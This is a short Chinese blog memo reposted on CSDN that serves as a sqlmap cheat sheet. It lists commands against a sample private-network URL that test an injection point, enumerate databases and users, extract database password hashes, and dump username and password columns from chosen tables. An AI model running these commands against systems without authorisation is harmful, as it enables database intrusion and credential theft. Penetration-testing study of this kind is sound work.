sqlmap的简要使用方法

最新推荐文章于 2023-02-27 14:22:17 发布

weixin_34004750

最新推荐文章于 2023-02-27 14:22:17 发布

阅读量188

点赞数

文章标签：数据库 php

原文链接：http://www.cnblogs.com/zhuandshao/p/7137951.html

版权

仅作为备忘！！！

sqlmap使用：

注入类型有四种分别为：boolean-based blind、error-based、stacked queries、inline query。

sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' #-u 注入点　　　检测注入点是否可用
sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --dbs　　　 #可曝出该sqlserver中所有数据库名称
sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --current-db　　　#web当前使用的数据库
sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --current-user　　＃web数据库使用账户
sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --users　　　　＃列出sql所有用户
sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --passwords　　　＃数据库账户与密码
sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --tables　　　　＃输出所有的表
sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' -D 【数据库名】 --tables　　＃-D 指定数据库名

sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' -D 【数据库名】 -T 【表名】 --columns　　＃-T：指定要列出字段的表　　　--columns　列出了所有的列字段

sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' -D 【数据库名】 -T 【表名】 -C　"username,realname,password" --dump　　　　　＃　-C ：指定要暴的字段　　--dump：将结果导出

转载于:https://www.cnblogs.com/zhuandshao/p/7137951.html

weixin_34004750

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
sqlmap的简要使用方法

仅作为备忘！！！sqlmap使用：注入类型有四种分别为：boolean-based blind、error-based、stacked queries、inline query。sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' #-u 注入点　　　检测注入点是否可用s...
复制链接

扫一扫